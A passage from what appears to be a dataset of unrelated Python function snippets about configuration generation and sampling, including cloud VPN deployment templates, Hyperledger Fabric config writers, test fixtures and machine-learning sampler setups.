name\n },\n {\n 'name': 'fileShares',\n 'value': '$(ref.{}.fileShares)'.format(context.env['name'])\n },\n {\n 'name': 'networks',\n 'value': '$(ref.{}.networks)'.format(context.env['name'])\n }\n ]\n }", "def generate_config(args):\n default_config = resource_string('webrpg', 'scripts/templates/default_config.txt').decode('utf-8')\n if args.sqla_connection_string:\n default_config = default_config.replace('%(sqlalchemy_url)s', args.sqla_connection_string)\n else:\n default_config = default_config.replace('%(sqlalchemy_url)s', get_user_parameter('SQL Alchemy Connection String', 'sqlite:///%(here)s/pyire_test.db'))\n\n with open(args.filename, 'w') as out_f:\n out_f.write(default_config)", "def _init_config(self):\n self.config = self.config_template.specialize()\n print('MMH CONFIG:\\n' + str(self.config))", "def gnupg_gen_key_conf(\n pytestconfig: \"_pytest.config.Config\", tmp_path_factory: TempPathFactory\n) -> Generator[Path, None, None]:\n name = \"gnupg-gen-key.conf\"\n yield from get_user_defined_file(pytestconfig, name)\n yield from get_embedded_file(tmp_path_factory, name=name)", "def generate_conf(self):\n if not os.path.exists(conf_utils.REFSTACK_RESULTS_DIR):\n os.makedirs(conf_utils.REFSTACK_RESULTS_DIR)\n\n self.tempestconf = TempestConf()\n self.tempestconf.generate_tempestconf()", "def test_sampler_building(self):\n with mmtools.utils.temporary_directory() as tmp_dir:\n template_script = self.get_implicit_template_script(tmp_dir)\n template_script['options']['resume_setup'] = True\n default_number_of_iterations = template_script['options']['default_number_of_iterations']\n\n # Add tested samplers.\n template_script['samplers'] = {\n 'my-sampler1': {\n 'type': 'ReplicaExchangeSampler',\n 'number_of_iterations': 9,\n 'replica_mixing_scheme': 'swap-neighbors',\n },\n 'my-sampler2': {\n 'type': 'MultiStateSampler',\n 'locality': 5\n }\n }\n\n def check_default_number_of_iterations(phase, sampler_description):\n if 'number_of_iterations' not in sampler_description:\n assert phase.sampler.number_of_iterations == default_number_of_iterations\n\n # Test that options are passed to the sampler correctly.\n for sampler_id, sampler_description in template_script['samplers'].items():\n template_script['experiments']['sampler'] = sampler_id\n constructor_description = template_script['samplers'][sampler_id]\n yield (self.check_constructor, template_script, constructor_description,\n 'sampler', None, check_default_number_of_iterations)", "def test_simple_config_file(self):\n # create the config file:\n test_name = \"unit_test_test_1\"\n K = \"'key'\"\n fam = 3\n W = 5\n D = 8\n num_circuits = 1\n num_inputs = 1\n config_file_text = \"\\n\".join([\"test_type = RANDOM\",\n \" = \".join([\"K\", str(K)]),\n \" = \".join([\"fam\", str(fam)]),\n \" = \".join([\"W\", str(W)]),\n \" = \".join([\"D\", str(D)]),\n \" = \".join([\"num_circuits\",\n str(num_circuits)]),\n \" = \".join([\"num_inputs\",\n str(num_inputs)]),\n \" = \".join([\"generate\", \"True\"])])\n config_file = StringIO.StringIO(config_file_text)\n # create the parser/generator:\n fho = tfho.test_file_handle_object()\n pag = gen.parser_and_generator(test_name, config_file, fho)\n pag.parse_and_generate()\n # retrieve the test file and check that it is correct:\n test_file = fho.get_file(os.path.join(test_name, \"test.txt\"))\n test_file_text = test_file.getvalue()\n expected_test_file_text = \"\\n\".join(\n [\"KEY\",\n os.path.join(\"stealth\", test_name, \"key\", str(1)),\n \"CIRCUIT\",\n os.path.join(\"stealth\", test_name, 
\"circuit\", str(1)),\n \"INPUT\",\n os.path.join(\"stealth\", test_name, \"input\", str(1)),\n \"\"])\n self.assertEqual(expected_test_file_text, test_file_text)\n # retrieve the key file and check that it is correct:\n key_file = fho.get_file(os.path.join(test_name, \"key\", \"1\"))\n key_file_text = key_file.getvalue()\n self.assertEqual(K, key_file_text)\n # retrieve the input and check that it is correct:\n input_file = fho.get_file(os.path.join(test_name, \"input\", \"1\"))\n input_file_text = input_file.getvalue()\n # check that input text begins and ends with a bracket:\n self.assertEqual(\"[\", input_file_text[0])\n self.assertEqual(\"]\", input_file_text[-1])\n # check that all bits are 0 or 1:\n for bit in input_file_text[1:-1]:\n self.assertTrue((bit == '0') or (bit == '1'))\n # retrieve the circuit and check that it begins with the correct header:\n circuit_file = fho.get_file(os.path.join(test_name, \"circuit\", \"1\"))\n circuit_file_text = circuit_file.getvalue()\n circuit_header = circuit_file_text.split(\"\\n\")[0]\n (W_string, D_string, fam_string) = circuit_header.split(\",\")\n W_value = int(W_string.split(\"=\")[-1])\n D_value = float(D_string.split(\"=\")[-1])\n fam_value = int(fam_string.split(\"=\")[-1])\n self.assertEqual(W, W_value)\n self.assertEqual(D, D_value)\n self.assertEqual(fam, fam_value)", "def sample_generator(self, sess):\n\n to_return = {\n 'g_sample': self.G_sample_test,\n }\n return sess.run(to_return)", "def test_cfg_example(checker):\n want = labeled.contents(label=\"generate-cfg\")\n got = Path(\"tests/generate.cfg\").read_text(encoding=\"utf-8\")\n checker(want, got)", "def generate_config():\n\n return {\n \"email_subject\": DEFAULT_EMAIL_SUBJECT,\n \"from_email\": DEFAULT_FROM_EMAIL,\n \"to_email\": DEFAULT_TO_EMAIL,\n \"url\": DEFAULT_URL,\n \"start_value\": DEFAULT_START_VALUE,\n \"look_ahead\": DEFAULT_LOOK_AHEAD,\n \"slide_window\": DEFAULT_SLIDE_WINDOW,\n }", "def mkconfig():\n basedir = os.path.join(os.path.expanduser('~'), '.strikepackage')\n\n # Try to populate dirs\n defaultdirs = [os.path.join(basedir, leaf)\n for leaf in ['examples', 'keys', 'templates']]\n\n for dirpath in defaultdirs:\n if not os.path.exists(dirpath):\n try:\n os.makedirs(dirpath, 0755)\n except (os.error, IOError) as ex:\n warn(\"Error while creating default directory: {}\".format(ex))\n\n # Try to place example confs if not present\n exdir = os.path.join(basedir, 'examples')\n exfiles = [(os.path.join(exdir, exfile[0]), exfile[1])\n for exfile in [('config.yaml', config_src),\n ('metadata.jinja2', metadata_src),\n ('userdata.jinja2', userdata_src)]]\n for exfile in exfiles:\n if not os.path.isfile(exfile[0]):\n try:\n with open(exfile[1], 'r') as f:\n src = f.read()\n with open(exfile[0], 'w+') as f:\n f.write(src)\n except IOError as ex:\n warn(\"Error writing example file: {}\".format(ex))", "def get_config_sample_speed():\n # try changing learning rate\n config = get_default_config()\n\n config['train_batch_size'] = 16384\n config['_policies'] = [None, \"from_scratch_sb\", \"pretrained\"]\n config['lr'] = 3e-4\n config['sgd_minibatch_size'] = 4096\n config['num_sgd_iter'] = 4\n config['rollout_fragment_length'] = 100\n config['num_workers'] = tune.grid_search([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n config['num_envs_per_worker'] = tune.grid_search([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n # ['humanoid_blocker', 'humanoid'],\n config['_train_policies'] = ['player_1']\n config['num_gpus'] = 0\n config['_train_steps'] = 20\n 
config[\"batch_mode\"] = \"complete_episodes\"\n\n config['_trainer'] = \"PPO\"\n config['_policy'] = \"PPO\"\n config['_call']['num_samples'] = 1\n config['_call']['resources_per_trial'] = {\n \"custom_resources\": {\"tune_cpu\": tune.sample_from(lambda spec: spec.config.num_workers + 10)}} # upper bound\n\n # config['_run_inline'] = True\n\n return config", "def fixture_sample_single() -> dict:\n _sample = {\n \"fastq\": \"<( zcat read_R1.fastq.gz )\",\n \"single_end\": True,\n \"sample_id\": \"single\",\n }\n return _sample", "def test_single_config(runConfig):\n finalConfig = {}\n finalConfig.update(runConfig.algorithm_config)\n finalConfig.update({\"function\": runConfig.algorithm_function})\n finalConfig.update({\"stop_predicate\": runConfig.stop_predicate})\n finalConfig.update({\"runNumber\": range(1,runConfig.number_of_runs+1)})\n finalConfig.update({\"max_iter\": runConfig.max_iter})\n #finalConfig.update({\"config_start_timestamp\": time.time()})\n #finalConfig.update({\"authors\": [runConfig.authors]})\n \n print(finalConfig)\n \n for element in itertools.product(\n *map(lambda t: [(t[0], x) for x in iterate(t[1])], finalConfig.items())):\n print(element)", "def dump_config_and_makefile(_config):\n experiment_dir = Path(_config['trainer']['storage_dir'])\n makefile_path = Path(experiment_dir) / \"Makefile\"\n\n if not makefile_path.exists():\n from padertorch.contrib.examples.source_separation.tasnet.templates import \\\n MAKEFILE_TEMPLATE_TRAIN\n\n config_path = experiment_dir / \"config.json\"\n pt.io.dump_config(_config, config_path)\n\n makefile_path.write_text(\n MAKEFILE_TEMPLATE_TRAIN.format(\n main_python_path=pt.configurable.resolve_main_python_path(),\n experiment_name=experiment_name,\n eval_python_path=('.'.join(\n pt.configurable.resolve_main_python_path().split('.')[:-1]\n ) + '.evaluate')\n )\n )", "def test_sample(system_generator):\n\n name, test = system_generator()\n print(name)\n\n w_F, w_R, N_k = test.sample([10, 8], mode=\"wFwR\")\n w_F, w_R, N_k = test.sample([1, 1], mode=\"wFwR\")\n w_F, w_R, N_k = test.sample([10, 0], mode=\"wFwR\")\n w_F, w_R, N_k = test.sample([0, 5], mode=\"wFwR\")", "def generate_cfg():\n \n if not os.path.exists(cfg_path):\n os.mkdir(cfg_path)\n \n for img_path in get_template_paths():\n extractor = BlockExtractor(img_path)\n extractor.get_cfg()\n for block in extractor.get_blocks():\n img = BlockParser(img_path, block).block_image()\n #cv.imshow(\"Block\", img)\n #cv.waitKey() & 0xFF", "def generate_configs(num_samples, state_validity_checker, limb_name):\n # Sample locations\n samples = sample_loc(num_samples=num_samples, name=limb_name)\n\n # Transform locations into arrays\n joint_value_array = zip(*samples.values()) # Convert to list, and then transform.\n joint_array = map(lambda joint: dict(zip(samples.keys(), joint)), joint_value_array) # Add key to each config\n\n configs = []\n for index in range(len(joint_array)):\n sample = joint_array[index]\n valid = check_config(sample, state_validity_checker, limb_name + \"_arm\")\n sample[SELF_COLLISION_KEY] = int(valid)\n configs.append(sample)\n return configs", "def generate_samples(self, config, num_samples):\n tic = time.time()\n\n generator = GMM(**config)\n weights = torch.rand(config.num_components)\n generator.component_weights.set_(weights / weights.sum())\n generator.gaussian.means.set_(torch.randn(config.num_components, config.num_features))\n\n if config.covariance == 'diag':\n generator.gaussian.covars.set_(torch.rand(config.num_components, config.num_features))\n\n 
samples = generator.sample(num_samples)\n\n toc = time.time()\n print(f\"Generated {num_samples:,} samples in {toc-tic:.2f} seconds.\")\n\n return samples", "def generate_config(context):\n\n\n properties = context.properties\n project_id = properties.get('project', context.env['project'])\n\n network = context.properties.get('networkURL', generate_network_uri(\n project_id,\n context.properties.get('network','')\n ))\n target_vpn_gateway = context.env['name'] + '-tvpng'\n esp_rule = context.env['name'] + '-esp-rule'\n udp_500_rule = context.env['name'] + '-udp-500-rule'\n udp_4500_rule = context.env['name'] + '-udp-4500-rule'\n vpn_tunnel = context.env['name'] + '-vpn'\n router_vpn_binding = context.env['name'] + '-router-vpn-binding'\n resources = []\n if 'ipAddress' in context.properties:\n ip_address = context.properties['ipAddress']\n static_ip = ''\n else:\n static_ip = context.env['name'] + '-ip'\n resources.append({\n # The reserved address resource.\n 'name': static_ip,\n # https://cloud.google.com/compute/docs/reference/rest/v1/addresses\n 'type': 'gcp-types/compute-v1:addresses',\n 'properties': {\n 'name': properties.get('name', static_ip),\n 'project': project_id,\n 'region': context.properties['region']\n }\n })\n ip_address = '$(ref.' + static_ip + '.address)'\n\n resources.extend([\n {\n # The target VPN gateway resource.\n 'name': target_vpn_gateway,\n # https://cloud.google.com/compute/docs/reference/rest/v1/targetVpnGateways\n 'type': 'gcp-types/compute-v1:targetVpnGateways',\n 'properties':\n {\n 'name': properties.get('name', target_vpn_gateway),\n 'project': project_id,\n 'network': network,\n 'region': context.properties['region'],\n }\n },\n {\n # The forwarding rule resource for the ESP traffic.\n 'name': esp_rule,\n # https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules\n 'type': 'gcp-types/compute-v1:forwardingRules',\n 'properties':\n {\n 'name': '{}-esp'.format(properties.get('name')) if 'name' in properties else esp_rule,\n 'project': project_id,\n 'IPAddress': ip_address,\n 'IPProtocol': 'ESP',\n 'region': context.properties['region'],\n 'target': '$(ref.' + target_vpn_gateway + '.selfLink)',\n }\n },\n {\n # The forwarding rule resource for the UDP traffic on port 4500.\n 'name': udp_4500_rule,\n # https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules\n 'type': 'gcp-types/compute-v1:forwardingRules',\n 'properties':\n {\n 'name': '{}-udp-4500'.format(properties.get('name')) if 'name' in properties else udp_4500_rule,\n 'project': project_id,\n 'IPAddress': ip_address,\n 'IPProtocol': 'UDP',\n 'portRange': 4500,\n 'region': context.properties['region'],\n 'target': '$(ref.' + target_vpn_gateway + '.selfLink)',\n }\n },\n {\n # The forwarding rule resource for the UDP traffic on port 500\n 'name': udp_500_rule,\n # https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules\n 'type': 'gcp-types/compute-v1:forwardingRules',\n 'properties':\n {\n 'name': '{}-udp-500'.format(properties.get('name')) if 'name' in properties else udp_500_rule,\n 'project': project_id,\n 'IPAddress': ip_address,\n 'IPProtocol': 'UDP',\n 'portRange': 500,\n 'region': context.properties['region'],\n 'target': '$(ref.' 
+ target_vpn_gateway + '.selfLink)',\n }\n },\n\n ])\n router_url_tag = 'routerURL'\n router_name_tag = 'router'\n\n if router_name_tag in context.properties:\n router_url = context.properties.get(router_url_tag, generate_router_uri(\n context.env['project'],\n context.properties['region'],\n context.properties[router_name_tag]))\n # Create dynamic routing VPN\n resources.extend([\n {\n # The VPN tunnel resource.\n 'name': vpn_tunnel,\n # https://cloud.google.com/compute/docs/reference/rest/v1/vpnTunnels\n 'type': 'gcp-types/compute-v1:vpnTunnels',\n 'properties':\n {\n 'name': properties.get('name', vpn_tunnel),\n 'project': project_id,\n 'description':\n 'A vpn tunnel',\n 'ikeVersion':\n 2,\n 'peerIp':\n context.properties['peerAddress'],\n 'region':\n context.properties['region'],\n 'router': router_url,\n 'sharedSecret':\n context.properties['sharedSecret'],\n 'targetVpnGateway':\n '$(ref.' + target_vpn_gateway + '.selfLink)'\n },\n 'metadata': {\n 'dependsOn': [esp_rule,\n udp_500_rule,\n udp_4500_rule]\n }\n }])\n else:\n # Create static routing VPN\n resources.append(\n {\n # The VPN tunnel resource.\n 'name': vpn_tunnel,\n 'type': 'gcp-types/compute-v1:vpnTunnels',\n 'properties': {\n 'name': vpn_tunnel,\n 'description':\n 'A vpn tunnel',\n 'ikeVersion':\n 2,\n 'peerIp':\n context.properties['peerAddress'],\n 'region':\n context.properties['region'],\n 'sharedSecret':\n context.properties['sharedSecret'],\n 'targetVpnGateway':\n '$(ref.' + target_vpn_gateway + '.selfLink)',\n 'localTrafficSelector':\n context.properties['localTrafficSelector'],\n 'remoteTrafficSelector':\n context.properties['remoteTrafficSelector'],\n\n },\n 'metadata': {\n 'dependsOn': [esp_rule, udp_500_rule, udp_4500_rule]\n }\n },\n )\n\n return {\n 'resources':\n resources,\n 'outputs':\n [\n {\n 'name': 'targetVpnGateway',\n 'value': target_vpn_gateway\n },\n {\n 'name': 'staticIp',\n 'value': static_ip\n },\n {\n 'name': 'espRule',\n 'value': esp_rule\n },\n {\n 'name': 'udp500Rule',\n 'value': udp_500_rule\n },\n {\n 'name': 'udp4500Rule',\n 'value': udp_4500_rule\n },\n {\n 'name': 'vpnTunnel',\n 'value': vpn_tunnel\n },\n {\n 'name': 'vpnTunnelUri',\n 'value': '$(ref.'+vpn_tunnel+'.selfLink)'\n }\n ]\n }", "def generate_config(container_data, file_path):\n pass", "def test_generateconfig(self):\n args = mock.Mock()\n args.debug = None\n args.generateconfig = True\n args.config = None\n expected_text = ('Sample configuration file written to sample_config.json\\n'\n \"Replicate the site JSON for each site.\\n\"\n \" Valid values for use_https and local are 'True' and 'False'\\n\"\n \" One site must have local set to 'True'\\n\"\n 'Replicate the export JSON for each exported contract.\\n')\n with mock.patch('sys.stdout', new=StringIO()) as fake_out:\n execute_tool(args)\n self.assertEqual(fake_out.getvalue(), expected_text)", "def sample_configuration_dist(config, root=True, num_samples_per_dist=1):\n if isinstance(config, dict):\n return {\n k: sample_configuration_dist(\n v, root=False, num_samples_per_dist=num_samples_per_dist)\n for k, v in sorted(config.items())\n }\n elif isinstance(config, list) and root:\n return [\n sample_configuration_dist(\n c, root=False, num_samples_per_dist=num_samples_per_dist)\n for c in config\n ]\n elif callable(config):\n return [config() for _ in range(num_samples_per_dist)]\n else:\n return config", "def GenerateConfig(context):\r\n \r\n module = \"frontend\"\r\n cc = config_merger.ConfigContext(context.properties, module)\r\n \r\n return {\r\n 'resources': [{\r\n 
'name': 'simple_frontend',\r\n 'type': 'simple_frontend.py',\r\n 'properties': context.properties\r\n }], \r\n 'outputs': [{\r\n 'name': 'env_name',\r\n 'value': context.properties[\"envName\"]\r\n },{\r\n 'name': 'context',\r\n 'value': cc.configs['CONTEXT']\r\n },{\r\n 'name': 'HQ_Address',\r\n 'value': cc.configs['HQ_Address']\r\n },{\r\n 'name': 'ServiceName',\r\n 'value': cc.configs['ServiceName']\r\n },{\r\n 'name': 'versionNR',\r\n 'value': cc.configs['versionNR']\r\n },{\r\n 'name': 'outp_3',\r\n 'value':str(cc.configs)\r\n }]\r\n \r\n }", "def configuration():", "def generator_setup():\n PaaSPureGenerator()", "def setUp(self):\n self.sampler = {\n \"name\": \"samplername\",\n \"backend_name\": \"\",\n \"backend_header\": \"\",\n \"backend_prefix\": \"\",\n \"backend_suffix\": \"\",\n \"backend_footer\": \"\",\n \"ncores\": 2,\n \"threads_per_core\": 1,\n \"omp_enabled\": True,\n \"papi_enabled\": True,\n \"papi_counters_max\": 2,\n \"papi_counters_avail\": (\"C1\", \"C2\", \"C3\"),\n \"kernels\": {\"dgemm\": (\n 'dgemm', 'char*', 'char*', 'int*', 'int*', 'int*', 'double*',\n 'double*', 'int*', 'double*', 'int*', 'double*', 'float*',\n 'int*'\n )},\n \"nt_max\": random.randint(1, 10),\n \"exe\": \"x\"\n }\n self.i = Symbol(\"i\")\n self.j = Symbol(\"j\")\n self.k = Symbol(\"k\")\n self.ns = [random.randint(1, 100) for _ in range(5)]", "def execute(self):\n if self._cli_arguments.get('<samplename>') == 'cfn':\n generate_sample_cfn_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'static-angular':\n generate_sample_static_angular(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'static-react':\n generate_sample_static_react(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'sls-py':\n generate_sample_sls_module(self.env_root, 'sls-py')\n elif self._cli_arguments.get('<samplename>') == 'sls-tsc':\n generate_sample_sls_module(self.env_root, 'sls-tsc')\n elif self._cli_arguments.get('<samplename>') == 'stacker':\n generate_sample_stacker_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'tf':\n generate_sample_tf_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'k8s-cfn-repo':\n generate_sample_k8s_cfn_repo(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'k8s-tf-repo':\n generate_sample_k8s_tf_repo(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'cdk-tsc':\n generate_sample_cdk_tsc_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'cdk-py':\n generate_sample_cdk_py_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'cdk-csharp':\n generate_sample_cdk_cs_module(self.env_root)\n else:\n LOGGER.info(\"Available samples to generate:\")\n for i in ['cfn', 'static-angular', 'static-react', 'sls-tsc',\n 'sls-py', 'tf', 'k8s-cfn-repo', 'k8s-tf-repo',\n 'stacker', 'cdk-tsc', 'cdk-py', 'cdk-csharp']:\n print(i)", "def generate_config(self):\n\n # Change crypto-config.yaml and add organizations\n yaml = YAML()\n with open(os.path.join(self.config_path, \"crypto-config-template.yaml\"), \"r\") as crypto_config_file:\n config = yaml.load(crypto_config_file)\n\n config[\"OrdererOrgs\"][0][\"Specs\"] = []\n for orderer_index in range(1, self.num_validators + 1):\n orderer_host, _ = self.experiment.get_peer_ip_port_by_id(orderer_index)\n config[\"OrdererOrgs\"][0][\"Specs\"].append({\n \"Hostname\": \"orderer%d\" % orderer_index,\n \"SANS\": [orderer_host]\n })\n\n config[\"PeerOrgs\"] = []\n for organization_index in range(1, 
self.num_validators + 1):\n organization_host, _ = self.experiment.get_peer_ip_port_by_id(organization_index)\n organization_config = {\n \"Name\": \"Org%d\" % organization_index,\n \"Domain\": \"org%d.example.com\" % organization_index,\n \"EnableNodeOUs\": True,\n \"Template\": {\n \"Count\": 1,\n \"SANS\": [organization_host]\n },\n \"Users\": {\n \"Count\": 1\n }\n }\n config[\"PeerOrgs\"].append(organization_config)\n\n with open(os.path.join(self.config_path, \"crypto-config.yaml\"), \"w\") as crypto_config_file:\n yaml.dump(config, crypto_config_file)\n\n # Change configtx.yaml\n yaml = YAML()\n with open(os.path.join(self.config_path, \"configtx-template.yaml\"), \"r\") as configtx_file:\n config = yaml.load(configtx_file)\n\n config[\"Profiles\"][\"TwoOrgsChannel\"][\"Application\"][\"Organizations\"] = []\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Consortiums\"][\"SampleConsortium\"][\"Organizations\"] = []\n\n for organization_index in range(1, self.num_validators + 1):\n org_admin = \"Org%dMSP.admin\" % organization_index\n org_peer = \"Org%dMSP.peer\" % organization_index\n org_client = \"Org%dMSP.client\" % organization_index\n organization_host, _ = self.experiment.get_peer_ip_port_by_id(organization_index)\n\n organization_config = {\n \"Name\": \"Org%dMSP\" % organization_index,\n \"ID\": \"Org%dMSP\" % organization_index,\n \"MSPDir\": \"crypto-config/peerOrganizations/org%d.example.com/msp\" % organization_index,\n \"Policies\": {\n \"Readers\": {\n \"Type\": \"Signature\",\n \"Rule\": \"OR('%s', '%s', '%s')\" % (org_admin, org_peer, org_client)\n },\n \"Writers\": {\n \"Type\": \"Signature\",\n \"Rule\": \"OR('%s', '%s')\" % (org_admin, org_peer)\n },\n \"Admins\": {\n \"Type\": \"Signature\",\n \"Rule\": \"OR('%s')\" % (org_admin)\n }\n },\n \"AnchorPeers\": [{\n \"Host\": organization_host,\n \"Port\": 7000 + organization_index\n }]\n }\n\n commented_map = CommentedMap(organization_config)\n commented_map.yaml_set_anchor(\"Org%d\" % organization_index, always_dump=True)\n config[\"Organizations\"].append(commented_map)\n config[\"Profiles\"][\"TwoOrgsChannel\"][\"Application\"][\"Organizations\"].append(commented_map)\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Consortiums\"][\"SampleConsortium\"][\"Organizations\"]\\\n .append(commented_map)\n\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"EtcdRaft\"][\"Consenters\"] = []\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"Addresses\"] = []\n\n for organization_index in range(1, self.num_validators + 1):\n organization_host, _ = self.experiment.get_peer_ip_port_by_id(organization_index)\n consenter_port = 7000 + organization_index\n consenter_info = {\n \"Host\": organization_host,\n \"Port\": consenter_port,\n \"ClientTLSCert\": \"crypto-config/ordererOrganizations/example.com/orderers/\"\n \"orderer%d.example.com/tls/server.crt\" % organization_index,\n \"ServerTLSCert\": \"crypto-config/ordererOrganizations/example.com/orderers/\"\n \"orderer%d.example.com/tls/server.crt\" % organization_index\n }\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"EtcdRaft\"][\"Consenters\"].append(consenter_info)\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"Addresses\"].append(\n \"%s:%d\" % (organization_host, consenter_port))\n\n with open(os.path.join(self.config_path, \"configtx.yaml\"), \"w\") as configtx_file:\n round_trip_dump(config, configtx_file, Dumper=RoundTripDumper)", "def generate_config_template():\n lines = ['# Lines 
starting with # will be skipped.']\n lines.append('# Only one argument on each line.')\n lines.append('#-s This option is always assumed to be true.')\n lines.append('#-p')\n lines.append('#-m')\n lines.append('#-o')\n lines.append('#-c')\n lines.append('-l')\n lines.append('#-a')\n lines.append('#-d')\n\n with open('export_config.txt', 'wb') as f_new:\n f_new.write('\\r\\n'.join(lines))\n print 'Template generated. Edit this file as you please and call this script '\\\n 'with the -f option enabled.'", "def generate():", "def create_generators(cfg, backbone):\n if cfg.anchor_params:\n if 'small' in cfg.anchor_params:\n anchor_params = AnchorParameters.small\n else:\n anchor_params = None\n else:\n anchor_params = None\n\n common_args = {\n 'batch_size': cfg.batchsize,\n 'config': None,\n 'image_min_side': cfg.image_size[0],\n 'image_max_side': cfg.image_size[1],\n 'filter_annotations_enabled': False,\n 'preprocess_image': backbone.preprocess_image,\n 'normalize_radar': cfg.normalize_radar,\n 'camera_dropout': cfg.dropout_image,\n 'radar_dropout': cfg.dropout_radar,\n 'channels': cfg.channels,\n 'distance': cfg.distance_detection,\n 'sample_selection': cfg.sample_selection,\n 'only_radar_annotated': cfg.only_radar_annotated,\n 'n_sweeps': cfg.n_sweeps,\n 'noise_filter': cfg.noise_filter_cfg,\n 'noise_filter_threshold': cfg.noise_filter_threshold,\n 'noisy_image_method': cfg.noisy_image_method,\n 'noise_factor': cfg.noise_factor,\n 'perfect_noise_filter': cfg.noise_filter_perfect,\n 'radar_projection_height': cfg.radar_projection_height,\n 'noise_category_selection': None if cfg.class_weights is None else cfg.class_weights.keys(),\n 'inference': cfg.inference,\n 'anchor_params': anchor_params,\n }\n\n # create random transform generator for augmenting training data\n if cfg.random_transform:\n transform_generator = random_transform_generator(\n min_rotation=-0.1,\n max_rotation=0.1,\n min_translation=(-0.1, -0.1),\n max_translation=(0.1, 0.1),\n min_shear=-0.1,\n max_shear=0.1,\n min_scaling=(0.9, 0.9),\n max_scaling=(1.1, 1.1),\n flip_x_chance=0.5,\n flip_y_chance=0.0,\n )\n else:\n transform_generator = random_transform_generator(flip_x_chance=0.5)\n\n category_mapping = cfg.category_mapping\n\n if 'nuscenes' in cfg.data_set:\n # import here to prevent unnecessary dependency on nuscenes\n from crfnet.data_processing.generator.nuscenes_generator import NuscenesGenerator\n from nuscenes.nuscenes import NuScenes\n\n if 'mini' in cfg.data_set:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n else:\n try:\n nusc = NuScenes(version='v1.0-trainval', dataroot=cfg.data_path, verbose=True)\n except ValueError:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n\n\n if 'debug' in cfg.scene_selection or 'mini' in cfg.data_set:\n scenes = Scenes.debug\n else:\n scenes = Scenes.default\n\n train_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.train,\n transform_generator=transform_generator,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n shuffle_groups=True,\n group_method='random',\n **common_args\n )\n\n # no dropouts in validation\n common_args['camera_dropout'] = 0\n common_args['radar_dropout'] = 0\n\n validation_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.val,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_generator = NuscenesGenerator(\n nusc,\n 
scene_indices=scenes.test,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_night_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_night,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_rain_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_rain,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n return train_generator, validation_generator, test_generator, test_night_generator, test_rain_generator\n else:\n raise ValueError('Invalid data type received: {}'.format(cfg.data_set))", "def generateConfig(run,subrun,conditions):\n \n configname = (conditions.numcdir + \"/\" + str(run) + \"/\" + str(subrun)\n + \"/numc_config_\" + str(run) + \"_\" + str(subrun) + \".cfg\")\n \n configContents = \"\"\n \n configContents += \"[software]\\n\"\n if conditions.oldneut:\n configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.1.4.2_nd280_ROOTv5r34p09n01/src/neutgeom/setup.sh\\n\"\n elif conditions.newoldneut:\n configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.1.4.3_nd280/src/neutgeom/setup.sh\\n\"\n else:\n #configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.3.1_nd280/src/neutgeom/setup.sh\\n\"\n #configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.3.1_nd280_wBBBA05/src/neutgeom/setup.sh\\n\"\n configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.3.2_nd280/src/neutgeom/setup.sh\\n\"\n \n configContents += \"[geometry]\\n\"\n\n configContents += \"baseline = \" + conditions.geometry +\"\\n\"\n if conditions.waterair == \"water\":\n configContents += \"p0d_water_fill = 1\\n\"\n else:\n configContents += \"p0d_water_fill = 0\\n\"\n \n configContents += \"\"\"\n \n[configuration]\nmodule_list = neutMC\n\n[filenaming]\n\"\"\"\n configContents += \"comment = \" + conditions.comment + \"\\n\"\n configContents += \"run_number = \" + str(run) +\"\\n\"\n configContents += \"subrun = \" + str(subrun) + \"\\n\"\n\n if conditions.oldneut:\n configContents += \"\"\" \n\n[neutrino]\nneut_card = /project/t/tanaka/T2K/neut/branches/5.1.4.2_nd280_ROOTv5r34p09n01/src/neutgeom/neut.card\n\"\"\"\n elif conditions.newoldneut:\n configContents += \"\"\" \n\n[neutrino]\nneut_card = /project/t/tanaka/T2K/neut/branches/5.1.4.3_nd280/src/neutgeom/neut.card\n\"\"\"\n else:\n configContents += \"\"\" \n\n[neutrino]\nneut_card = /project/t/tanaka/T2K/neut/branches/5.3.2_nd280/src/neutgeom/neut.card\n\"\"\"\n\n configContents += \"flux_file = \" + 